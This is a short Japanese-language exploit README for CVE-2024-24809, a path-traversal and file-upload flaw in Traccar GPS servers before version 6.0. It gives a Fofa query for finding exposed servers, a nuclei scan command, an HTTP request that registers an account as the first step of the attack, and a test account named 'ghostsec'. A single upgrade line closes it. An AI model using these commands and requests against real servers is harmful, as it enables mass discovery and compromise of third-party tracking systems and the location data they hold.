
Traccar GPSシステムの重大な欠陥がユーザーをリモート攻撃に晒す
#説明
TraccarはオープンソースのGPS追跡システムです。6.0より前のバージョンは、パストラバーサルおよび危険なタイプのファイルの無制限アップロードに対して脆弱です。システムはデフォルトで登録を許可しているため、攻撃者はアカウントを登録して通常ユーザー権限を取得し、この脆弱性を悪用して任意のフォルダにプレフィックスdevice.を持つファイルをアップロードできます。攻撃者はこの脆弱性をフィッシング、クロスサイトスクリプティング攻撃、およびサーバー上での任意のコマンド実行に使用する可能性があります。バージョン6.0にはこの問題のパッチが含まれています。
#使用方法
Fofa query : app="traccar"
nuclei --target {target.com} -t CVE-2024-24809.yaml
#概念実証 (Burp Suite使用)
POST /api/users HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
{"name": "{{name}}", "email": "{{email}}", "password": "{{password}}", "totpKey": null}
#テストアカウント
name: "ghostsec"
password: "ghostsec"
email: "[email protected]"
org.traccar:traccarをバージョン6.0以上にアップグレードしてください。